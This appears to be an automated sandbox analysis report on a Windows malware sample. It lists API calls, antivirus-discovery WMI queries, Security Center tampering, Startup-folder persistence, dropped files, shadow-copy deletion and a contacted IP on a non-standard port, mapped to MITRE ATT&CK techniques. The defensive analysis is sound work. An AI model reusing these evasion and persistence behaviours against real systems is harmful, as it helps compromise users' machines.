      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00B01BDB GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00B01BDB
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00A836F0 GetUserNameW,0_2_00A836F0
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00B3B462 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_00B3B462
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00B06793 GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,0_2_00B06793
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Lowering of HIPS / PFW / Operating System Security Settings

      Source: C:\Windows\System32\svchost.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
      Source: svchost.exe, 0000000A.00000002.2505440604.000001B89F302000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
      Source: svchost.exe, 0000000A.00000002.2505440604.000001B89F302000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
      Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
      Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
      Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
      Source: C:\Program Files\Windows Defender\MpCmdRun.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
      Source: C:\Program Files\Windows Defender\MpCmdRun.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00A71960 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,0_2_00A71960
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00A71020 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,0_2_00A71020
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00A712E0 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,0_2_00A712E0
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00B12073 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_00B12073
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00B12D69 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_00B12D69
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 48_2_000B2073 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,48_2_000B2073
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 48_2_000B2D69 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,48_2_000B2D69
      MITRE ATT&CK Matrix (one technique per cell; a leading number is the count of signatures matched for that technique):

      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
      Gather Victim Identity Information | 12 Scripting | 1 Replication Through Removable Media | 241 Windows Management Instrumentation | 12 Scripting | 1 DLL Side-Loading | 1 Disable or Modify Tools | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
      Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 11 Windows Service | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 11 Peripheral Device Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
      Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | 11 Windows Service | 12 Process Injection | 2 Obfuscated Files or Information | Security Account Manager | 1 Account Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 11 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
      Employee Names | Virtual Private Server | Local Accounts | 1 Service Execution | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 1 DLL Side-Loading | NTDS | 3 File and Directory Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
      Gather Victim Network Information | Server | Cloud Accounts | Launchd | 12 Registry Run Keys / Startup Folder | 12 Registry Run Keys / Startup Folder | 1 File Deletion | LSA Secrets | 68 System Information Discovery | SSH | Keylogging | 2 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
      Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 11 Masquerading | Cached Domain Credentials | 1 Network Share Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
      DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 15 Virtualization/Sandbox Evasion | DCSync | 281 Security Software Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
      Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Process Injection | Proc Filesystem | 15 Virtualization/Sandbox Evasion | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
      Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Indicator Removal | /etc/passwd and /etc/shadow | 3 Process Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
      IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | 1 System Owner/User Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
      Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | Stripped Payloads | Input Capture | 1 System Network Configuration Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
      Behavior Graph (rendered image; recoverable node data follows)

      Behavior Graph ID: 1569984 | Sample: BiXS3FRoLe.exe | Start date: 06/12/2024 | Architecture: WINDOWS | Score: 100

      Network nodes:
      • api.ipify.org 104.26.13.205, 49709, 80 CLOUDFLARENETUS United States (contacted by BiXS3FRoLe.exe)
      • 185.147.34.53, 3586, 49715 HOSTSLIM-GLOBAL-NETWORKNL Iceland (contacted by BiXS3FRoLe.exe)

      Dropped-file nodes (from BiXS3FRoLe.exe):
      • C:\Users\user\AppData\...\Xinfecter.exe, PE32
      • C:\Windows\SysMain.sys, ASCII
      • C:\Users\user\AppData\S-8459.vbs, ASCII
      • 4 other malicious files

      Signature nodes: Suricata IDS alerts for network traffic; Antivirus detection for dropped file; Antivirus / Scanner detection for submitted sample; 12 other signatures; Deletes shadow drive data (may be related to ransomware); Drops PE files to the startup folder; Sample is not signed and drops a device driver; Contains functionality to clear event logs; Changes security center settings (notifications, updates, antivirus, firewall); Uses schtasks.exe or at.exe to add and modify task schedules; Windows Scripting host queries suspicious COM object (likely to drop second stage); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Writes or reads registry keys via WMI

      Process nodes: BiXS3FRoLe.exe started cmd.exe (three instances) and 9 other processes; cmd.exe instances started systeminfo.exe, find.exe, wscript.exe, tasklist.exe and findstr.exe; wscript.exe instances started cmd.exe, which in turn started conhost.exe, tasklist.exe, find.exe and 12 other processes; svchost.exe started MpCmdRun.exe, which started conhost.exe; 5 other processes ran from the start node.
